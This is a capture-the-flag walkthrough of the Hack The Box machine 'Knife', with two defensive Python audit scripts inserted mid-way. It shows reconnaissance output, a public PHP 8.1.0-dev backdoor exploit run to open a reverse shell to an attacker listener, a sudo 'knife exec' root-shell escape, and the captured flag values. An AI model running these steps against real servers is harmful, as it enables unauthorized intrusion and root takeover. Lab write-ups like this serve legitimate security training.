
HTB Knife done

Knife

OS:

Linux

Technology:

IP Address:

10.129.109.64

Open ports:

22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))

Users and pass:

Nmap

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Knife]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.109.64_nmap 10.129.109.64 ; cat 10.129.109.64_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-16 19:44 UTC
Nmap scan report for 10.129.109.64
Host is up (0.033s latency).
Not shown: 65476 closed tcp ports (reset), 57 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea

Ffuf: http://10.129.109.64

Rabbit hole
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Knife]
└─$ ffuf -u http://10.129.109.64/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o 10.129.109.64_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md                                             

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.129.109.64/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/big.txt
 :: Extensions       : .php .html .txt .bac .backup .md 
 :: Output file      : 10.129.109.64_ffuz.{json,ejson,html,md,csv,ecsv}
 :: File format      : all
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

index.php               [Status: 200, Size: 5815, Words: 646, Lines: 221, Duration: 35ms]
:: Progress: [143283/143283] :: Job [1/1] :: 83 req/sec :: Duration: [0:02:10] :: Errors: 0 ::

Nikto: http://10.129.109.64

I found the version of PHP: 8.1.0-dev
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Knife]
└─$ nikto -host http://10.129.109.64
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.129.109.64
+ Target Hostname:    10.129.109.64
+ Target Port:        80
+ Start Time:         2024-11-16 20:21:51 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ /: Retrieved x-powered-by header: PHP/8.1.0-dev.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ 8102 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time:           2024-11-16 20:27:01 (GMT0) (310 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
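The Nikto output above reduces to two facts worth acting on: the `X-Powered-By` header advertises `PHP/8.1.0-dev`, a version string no released PHP ever carried, and two hardening headers are absent. The script below is an added example (not part of the writeup, not from Nikto) that turns those findings into a repeatable header audit. The sample response block is constructed from the header values Nikto reported; `fetch_and_audit` is a live variant that needs network access and is not exercised offline.

```python
"""Audit the HTTP response headers Nikto reported above (added example)."""
import urllib.request

# Constructed response header block, modelled on the Nikto findings above
# (Server and X-Powered-By values as reported; the rest is made up).
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.41 (Ubuntu)\r\n"
    "X-Powered-By: PHP/8.1.0-dev\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html>...</html>"
)

# No release ever carried this version string; a server advertising it is
# running the compromised development build and should be rebuilt.
BACKDOORED_PHP_BUILDS = {"PHP/8.1.0-dev"}

# Hardening headers Nikto flagged as absent.
REQUIRED_SECURITY_HEADERS = {
    "x-frame-options": "anti-clickjacking header not present",
    "x-content-type-options": "MIME-sniffing protection not set",
}


def parse_headers(raw: str) -> dict:
    """Return the headers of an HTTP/1.x response as a lower-cased dict."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    if not lines[0].startswith("HTTP/"):
        raise ValueError("not an HTTP response")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def audit_headers(raw: str) -> list:
    """Turn a raw response into a list of (severity, message) findings."""
    headers = parse_headers(raw)
    findings = []
    powered_by = headers.get("x-powered-by", "")
    if powered_by in BACKDOORED_PHP_BUILDS:
        findings.append(("CRITICAL", f"X-Powered-By advertises backdoored build {powered_by}"))
    elif powered_by:
        findings.append(("INFO", f"X-Powered-By discloses runtime version: {powered_by}"))
    for name, why in REQUIRED_SECURITY_HEADERS.items():
        if name not in headers:
            findings.append(("LOW", f"{why} ({name})"))
    return findings


def fetch_and_audit(url: str, timeout: float = 5.0) -> list:
    """Live variant: HEAD the URL and audit the real headers (needs network)."""
    req = urllib.request.Request(url, method="HEAD")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        raw = f"HTTP/1.1 {resp.status} {resp.reason}\r\n"
        raw += "".join(f"{k}: {v}\r\n" for k, v in resp.getheaders())
        raw += "\r\n"
    return audit_headers(raw)


if __name__ == "__main__":
    for severity, message in audit_headers(SAMPLE_RESPONSE):
        print(f"[{severity}] {message}")
```

Run against a fleet inventory, the CRITICAL match is the one that matters: the fix is not a header change but replacing the PHP build; the two LOW findings are ordinary Apache hardening (`Header always set X-Frame-Options` and `X-Content-Type-Options: nosniff`).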

Exploit: PHP 8.1.0-dev Backdoor Remote Code Execution

https://github.com/flast101/php-8.1.0-dev-backdoor-rce

Download exploit

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Knife]
└─$ git clone https://github.com/flast101/php-8.1.0-dev-backdoor-rce.git
Cloning into 'php-8.1.0-dev-backdoor-rce'...
remote: Enumerating objects: 241, done.
remote: Counting objects: 100% (239/239), done.
remote: Compressing objects: 100% (113/113), done.
remote: Total 241 (delta 128), reused 232 (delta 124), pack-reused 2 (from 1)
Receiving objects: 100% (241/241), 1.66 MiB | 6.43 MiB/s, done.
Resolving deltas: 100% (128/128), done.

Run exploit - revshell

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Knife]
└─$ cd php-8.1.0-dev-backdoor-rce                                          

┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Knife/php-8.1.0-dev-backdoor-rce]
└─$ ls    
backdoor_php_8.1.0-dev.py  docs  README.md  revshell_php_8.1.0-dev.py

┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Knife/php-8.1.0-dev-backdoor-rce]
└─$ python revshell_php_8.1.0-dev.py                                                
usage: revshell_php_8.1.0-dev.py [-h] <target URL> <attacker IP> <attacker PORT>
revshell_php_8.1.0-dev.py: error: the following arguments are required: <target URL>, <attacker IP>, <attacker PORT>

┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Knife/php-8.1.0-dev-backdoor-rce]
└─$ python revshell_php_8.1.0-dev.py http://10.129.109.64 10.10.14.117 80
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Knife]
└─$ netcat -lvnp 80                 
listening on [any] 80 ...
connect to [10.10.14.117] from (UNKNOWN) [10.129.109.64] 51078
bash: cannot set terminal process group (891): Inappropriate ioctl for device
bash: no job control in this shell
james@knife:/$ 

Read flag: user.txt


james@knife:/$ find / -name "user.txt" 2>/dev/null
find / -name "user.txt" 2>/dev/null
/home/james/user.txt
james@knife:/$ 

james@knife:/$ id ; ip a ; cat /home/james/user.txt     
id ; ip a ; cat /home/james/user.txt
uid=1000(james) gid=1000(james) groups=1000(james)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:94:4a:29 brd ff:ff:ff:ff:ff:ff
    inet 10.129.109.64/16 brd 10.129.255.255 scope global dynamic ens160
       valid_lft 2491sec preferred_lft 2491sec
    inet6 dead:beef::250:56ff:fe94:4a29/64 scope global dynamic mngtmpaddr 
       valid_lft 86400sec preferred_lft 14400sec
    inet6 fe80::250:56ff:fe94:4a29/64 scope link 
       valid_lft forever preferred_lft forever
5da789399c373f6a645900b68845cca9
james@knife:/$ 

Privilege Escalation

Sudo -l

james@knife:/$ sudo -l
sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

Get info about file: /usr/bin/knife

james@knife:/$ ls -la /usr/bin/knife
ls -la /usr/bin/knife
lrwxrwxrwx 1 root root 31 May  7  2021 /usr/bin/knife -> /opt/chef-workstation/bin/knife
james@knife:/$ ls -la /opt/chef-workstation/bin/knife
ls -la /opt/chef-workstation/bin/knife
-rwxr-xr-x 1 root root 11697 Feb 15  2021 /opt/chef-workstation/bin/knife
james@knife:/$ 

james@knife:/$ file /usr/bin/knife
file /usr/bin/knife
/usr/bin/knife: symbolic link to /opt/chef-workstation/bin/knife
james@knife:/$ 
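The `sudo -l` and `ls -la` output above is exactly what a sudoers audit should catch: a NOPASSWD rule for a binary that is itself a symlink into a Chef workstation install, and one whose `exec` subcommand runs arbitrary Ruby, so the rule is a root shell in all but name. The script below is an added example (not from the writeup or from GTFOBins) that parses `sudo -l` output and flags such rules. The sample input reuses the session's real lines plus one constructed benign rule (the `tail` entry) so that the audit has something to pass; the symlink map mirrors the `ls -la` result, where a live audit would call `os.path.realpath`; the `SHELL_CAPABLE` set is a starting list taken from binaries GTFOBins documents with a sudo shell escape.

```python
"""Audit `sudo -l` output for rules that amount to a root shell (added example)."""
import re

# The `sudo -l` output from the session above, plus one constructed benign
# rule (the tail line) so the audit has a rule that should pass.
SUDO_L_OUTPUT = r"""
Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
    (root) /usr/bin/tail -f /var/log/syslog
"""

# Symlink target as shown by `ls -la` above; a live audit would use os.path.realpath.
SYMLINKS = {"/usr/bin/knife": "/opt/chef-workstation/bin/knife"}

# Starting list of binaries GTFOBins documents with a sudo shell escape;
# knife is there because `knife exec` evaluates arbitrary Ruby.
SHELL_CAPABLE = {"knife", "bash", "sh", "vim", "vi", "less", "more", "find",
                 "python3", "perl", "ruby", "awk", "env", "nmap"}

# "(root) NOPASSWD: /usr/bin/knife"  ->  runas, optional tags, command
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")


def parse_sudo_l(text):
    """Return the command rules from `sudo -l` as dicts (runas, tags, command)."""
    entries, in_rules = [], False
    for line in text.splitlines():
        if re.match(r"^User \S+ may run the following commands", line):
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = ENTRY_RE.match(line)
        if m:
            tags = tuple(t.rstrip(":") for t in m.group("tags").split())
            entries.append({"runas": m.group("runas"), "tags": tags, "command": m.group("cmd")})
    return entries


def audit_sudo_rules(entries, symlinks=None):
    """Flag rules whose binary can escape to a shell; returns (command, severity, reasons)."""
    symlinks = symlinks or {}
    findings = []
    for e in entries:
        argv = e["command"].split()
        resolved = symlinks.get(argv[0], argv[0])
        name = resolved.rsplit("/", 1)[-1]
        if name not in SHELL_CAPABLE:
            continue
        reasons = [f"{name} has a known shell escape, so the rule grants a full {e['runas']} shell"]
        severity = "HIGH" if e["runas"].lower() in ("root", "all") else "MEDIUM"
        if "NOPASSWD" in e["tags"]:
            reasons.append("NOPASSWD: no password is required to use it")
        if resolved != argv[0]:
            reasons.append(f"{argv[0]} is a symlink to {resolved}; verify both are root-owned and not writable")
        findings.append((e["command"], severity, reasons))
    return findings


if __name__ == "__main__":
    for cmd, sev, reasons in audit_sudo_rules(parse_sudo_l(SUDO_L_OUTPUT), SYMLINKS):
        print(f"[{sev}] {cmd}")
        for r in reasons:
            print(f"    - {r}")
```

The remediation the HIGH finding points at is to remove the rule rather than tighten it: sudoers cannot safely restrict `knife` to harmless subcommands once `exec` is reachable, so the Chef tooling should run as a dedicated unprivileged user.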

GTFOBins - knife

james@knife:/$ sudo knife exec -E 'exec "/bin/sh"'

script /dev/null -c /bin/bash
Script started, file is /dev/null
root@knife:/# 

Read flag: root.txt

root@knife:/# cd /root
cd /root
root@knife:~# ls -a
ls -a
.              .bashrc  delete.sh  .rnd              snap
..             .cache   .local     root.txt          .ssh
.bash_history  .chef    .profile   .selected_editor  .viminfo
root@knife:~# 

root@knife:~# id ; ip a ; cat root.txt
id ; ip a ; cat root.txt
uid=0(root) gid=0(root) groups=0(root)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:94:4a:29 brd ff:ff:ff:ff:ff:ff
    inet 10.129.109.64/16 brd 10.129.255.255 scope global dynamic ens160
       valid_lft 3252sec preferred_lft 3252sec
    inet6 dead:beef::250:56ff:fe94:4a29/64 scope global dynamic mngtmpaddr 
       valid_lft 86396sec preferred_lft 14396sec
    inet6 fe80::250:56ff:fe94:4a29/64 scope link 
       valid_lft forever preferred_lft forever
fb40f795f0f839c77dc99b6f0485a05c
root@knife:~# 

References

[PHP 8.1.0-dev Backdoor Remote Code Execution](https://github.com/flast101/php-8.1.0-dev-backdoor-rce)

[GTFOBins - knife](https://gtfobins.github.io/gtfobins/knife/)

Lessons Learned

Tags